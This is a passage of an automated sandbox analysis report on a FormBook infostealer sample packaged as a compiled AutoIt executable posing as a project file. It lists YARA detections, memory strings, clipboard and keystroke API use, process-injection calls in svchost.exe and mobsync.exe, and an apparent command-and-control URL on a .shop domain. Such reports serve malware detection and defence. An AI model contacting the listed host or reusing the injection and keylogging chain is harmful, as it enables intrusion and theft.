                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: mobsync.exe, 00000003.00000002.3503963835.00000000062F2000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000004352000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zkdamdjj.shop/kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00834164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00834164
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00834164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00834164
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00833F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00833F66
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0082001C
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0084CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0084CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1863712666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1867432570.0000000007C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3503391592.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3503361317.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3502685707.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3502512945.0000000002E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3504903691.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1864625418.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: This is a third-party compiled AutoIt script.0_2_007C3B3A
                Source: YH-3-12-2024-GDL Units - Projects.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_79dd580b-f
                Source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c3ba9192-e
                Source: YH-3-12-2024-GDL Units - Projects.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d8fb6644-9
                Source: YH-3-12-2024-GDL Units - Projects.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_208e341c-6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C483 NtClose,1_2_0042C483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B60 NtClose,LdrInitializeThunk,1_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk,1_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74340 NtSetContextThread,1_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74650 NtSuspendThread,1_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BE0 NtQueryValueKey,1_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BF0 NtAllocateVirtualMemory,1_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B80 NtQueryInformationFile,1_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BA0 NtEnumerateValueKey,1_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AD0 NtReadFile,1_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AF0 NtWriteFile,1_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AB0 NtWaitForSingleObject,1_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FE0 NtCreateFile,1_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F90 NtProtectVirtualMemory,1_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FA0 NtQuerySection,1_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FB0 NtResumeThread,1_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F60 NtCreateProcessEx,1_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F30 NtCreateSection,1_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EE0 NtQueueApcThread,1_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E80 NtReadVirtualMemory,1_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EA0 NtAdjustPrivilegesToken,1_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E30 NtWriteVirtualMemory,1_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DD0 NtDelayExecution,1_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DB0 NtEnumerateKey,1_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D00 NtSetInformationFile,1_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D10 NtMapViewOfSection,1_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D30 NtUnmapViewOfSection,1_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CC0 NtQueryVirtualMemory,1_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CF0 NtOpenProcess,1_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CA0 NtQueryInformationToken,1_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C60 NtCreateKey,1_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C70 NtFreeVirtualMemory,1_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C00 NtQueryInformationProcess,1_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73090 NtSetValueKey,1_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73010 NtOpenDirectoryObject,1_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C739B0 NtGetContextThread,1_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D70 NtOpenThread,1_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D10 NtOpenProcessToken,1_2_03C73D10
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E54650 NtSuspendThread,LdrInitializeThunk,3_2_04E54650
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E54340 NtSetContextThread,LdrInitializeThunk,3_2_04E54340
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04E52CA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52C60 NtCreateKey,LdrInitializeThunk,3_2_04E52C60
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04E52C70
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04E52DF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52DD0 NtDelayExecution,LdrInitializeThunk,3_2_04E52DD0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_04E52D30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04E52D10
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52EE0 NtQueueApcThread,LdrInitializeThunk,3_2_04E52EE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52FE0 NtCreateFile,LdrInitializeThunk,3_2_04E52FE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52FB0 NtResumeThread,LdrInitializeThunk,3_2_04E52FB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52F30 NtCreateSection,LdrInitializeThunk,3_2_04E52F30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52AF0 NtWriteFile,LdrInitializeThunk,3_2_04E52AF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52AD0 NtReadFile,LdrInitializeThunk,3_2_04E52AD0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52B60 NtClose,LdrInitializeThunk,3_2_04E52B60
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E535C0 NtCreateMutant,LdrInitializeThunk,3_2_04E535C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E539B0 NtGetContextThread,LdrInitializeThunk,3_2_04E539B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52CF0 NtOpenProcess,3_2_04E52CF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52CC0 NtQueryVirtualMemory,3_2_04E52CC0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52C00 NtQueryInformationProcess,3_2_04E52C00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52DB0 NtEnumerateKey,3_2_04E52DB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52D00 NtSetInformationFile,3_2_04E52D00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52EA0 NtAdjustPrivilegesToken,3_2_04E52EA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52E80 NtReadVirtualMemory,3_2_04E52E80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52E30 NtWriteVirtualMemory,3_2_04E52E30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52FA0 NtQuerySection,3_2_04E52FA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52F90 NtProtectVirtualMemory,3_2_04E52F90
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52F60 NtCreateProcessEx,3_2_04E52F60
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52AB0 NtWaitForSingleObject,3_2_04E52AB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52BE0 NtQueryValueKey,3_2_04E52BE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52BF0 NtAllocateVirtualMemory,3_2_04E52BF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52BA0 NtEnumerateValueKey,3_2_04E52BA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E52B80 NtQueryInformationFile,3_2_04E52B80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E53090 NtSetValueKey,3_2_04E53090
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E53010 NtOpenDirectoryObject,3_2_04E53010
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E53D70 NtOpenThread,3_2_04E53D70
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04E53D10 NtOpenProcessToken,3_2_04E53D10
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02EA9270 NtReadFile,3_2_02EA9270
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02EA9370 NtDeleteFile,3_2_02EA9370
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02EA9100 NtCreateFile,3_2_02EA9100
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02EA9410 NtClose,3_2_02EA9410
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0082A1EF
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00818310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00818310
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008251BD
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007ED9750_2_007ED975
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007CFCE00_2_007CFCE0
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007E21C50_2_007E21C5
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007F62D20_2_007F62D2
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008403DA0_2_008403DA
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007F242E0_2_007F242E
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007E25FA0_2_007E25FA
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0081E6160_2_0081E616
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007D66E10_2_007D66E1
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007CE6A00_2_007CE6A0
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007F878F0_2_007F878F
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008288890_2_00828889
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007F68440_2_007F6844
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007D88080_2_007D8808
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008408570_2_00840857
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007ECB210_2_007ECB21
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007F6DB60_2_007F6DB6
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007D6F9E0_2_007D6F9E
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007D30300_2_007D3030
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007EF1D90_2_007EF1D9
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007E31870_2_007E3187
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007C12870_2_007C1287
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007E14840_2_007E1484
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007D55200_2_007D5520
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007E76960_2_007E7696
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007D57600_2_007D5760
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007E19780_2_007E1978
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007F9AB50_2_007F9AB5
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00847DDB0_2_00847DDB
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007EBDA60_2_007EBDA6
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007E1D900_2_007E1D90
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007CDF000_2_007CDF00
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007D3FE00_2_007D3FE0
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00F755A80_2_00F755A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183B31_2_004183B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029291_2_00402929
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029301_2_00402930
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012001_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EAA31_2_0042EAA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FBF31_2_0040FBF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402DF01_2_00402DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DDF31_2_0040DDF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025901_2_00402590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165B31_2_004165B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE131_2_0040FE13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF431_2_0040DF43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF371_2_0040DF37
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F01_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D003E61_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA3521_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC02C01_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE02741_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF81CC1_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF41A21_2_03CF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D001AA1_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC81581_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C301001_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA1181_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD20001_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C01_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C647501_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C407701_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C6E01_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D005911_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C405351_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEE4F61_2_03CEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF24461_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE44201_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF6BD71_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFAB401_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA801_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A01_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0A9A61_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C569621_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E8F01_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C268B81_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4A8401_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428401_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32FC81_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBEFA01_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4F401_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C82F281_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60F301_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE2F301_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEEDB1_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52E901_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFCE931_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40E591_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEE261_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3ADE01_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C58DBF1_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4AD001_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDCD1F1_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30CF21_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0CB51_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40C001_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8739A1_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2D34C1_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF132D1_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B2C01_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE12ED1_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5D2F01_2_03C5D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C452A01_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4B1B01_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7516C1_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2F1721_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0B16B1_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEF0CC1_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C470C01_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF70E91_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF0E01_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF7B01_2_03CFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF16CC1_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C856301_2_03C85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D095C31_2_03D095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDD5B01_2_03CDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF75711_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C314601_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF43F1_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB5BF01_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7DBF91_2_03C7DBF9
